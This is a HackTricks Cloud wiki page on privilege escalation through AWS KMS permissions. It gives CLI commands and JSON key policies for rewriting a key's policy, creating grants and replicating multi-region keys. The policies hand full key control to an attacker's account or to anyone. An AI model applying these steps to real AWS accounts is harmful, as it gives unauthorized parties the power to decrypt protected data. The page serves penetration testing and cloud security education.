HackTricks Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - KMS Privesc

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

KMS

For more info about KMS check:

pageAWS - KMS Enum

kms:ListKeys,kms:PutKeyPolicy, (kms:ListKeyPolicies, kms:GetKeyPolicy)

With these permissions it's possible to modify the access permissions to the key so it can be used by other accounts or even anyone:

aws kms list-keys
aws kms list-key-policies --key-id <id> # Although only 1 max per key
aws kms get-key-policy --key-id <id> --policy-name <policy_name>
# AWS KMS keys can only have 1 policy, so you need to use the same name to overwrite the policy (the name is usually "default")
aws kms put-key-policy --key-id <id> --policy-name <policy_name> --policy file:///tmp/policy.json

policy.json:

{
    "Version" : "2012-10-17",
    "Id" : "key-consolepolicy-3",
    "Statement" : [ 
        {
            "Sid" : "Enable IAM User Permissions",
            "Effect" : "Allow",
            "Principal" : {
                "AWS" : "arn:aws:iam::<origin_account>:root"
            },
            "Action" : "kms:*",
            "Resource" : "*"
        }, 
        {
            "Sid" : "Allow all use",
            "Effect" : "Allow",
            "Principal" : {
                "AWS" : "arn:aws:iam::<attackers_account>:root"
            },
            "Action" : [ "kms:*" ],
            "Resource" : "*"
        }
    ]
}

kms:CreateGrant

It allows a principal to use a KMS key:

aws kms create-grant \
    --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
    --grantee-principal arn:aws:iam::123456789012:user/exampleUser \
    --operations Decrypt

A grant can only allow certain types of operations: https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations

Note that it might take a couple of minutes for KMS to allow the user to use the key after the grant has been generated. Once that time has passed, the principal can use the KMS key without needing to specify anything. However, if it's needed to use the grant right away use a grant token (check the following code). For more info read this.

# Use the grant token in a request
aws kms generate-data-key \
    --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
    –-key-spec AES_256 \
    --grant-tokens $token

Note that it's possible to list grant of keys with:

aws kms list-grants --key-id <value>

kms:CreateKey, kms:ReplicateKey

With these permissions it's possible to replicate a multi-region enabled KMS key in a different region with a different policy.

So, an attacker could abuse this to obtain privesc his access to the key and use it

aws kms replicate-key --key-id mrk-c10357313a644d69b4b28b88523ef20c --replica-region eu-west-3 --bypass-policy-lockout-safety-check --policy file:///tmp/policy.yml

{
    "Version": "2012-10-17",
    "Id": "key-consolepolicy-3",
    "Statement": [
        {
            "Sid": "Enable IAM User Permissions",
            "Effect": "Allow",
            "Principal": {
                "AWS": "*"
            },
            "Action": "kms:*",
            "Resource": "*"
        }
    ]
}

kms:Decrypt

This permission allows to use a key to decrypt some information. For more information check:

pageAWS - KMS Post Exploitation
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

PreviousAWS - IAM PrivescNextAWS - Lambda Privesc

Last updated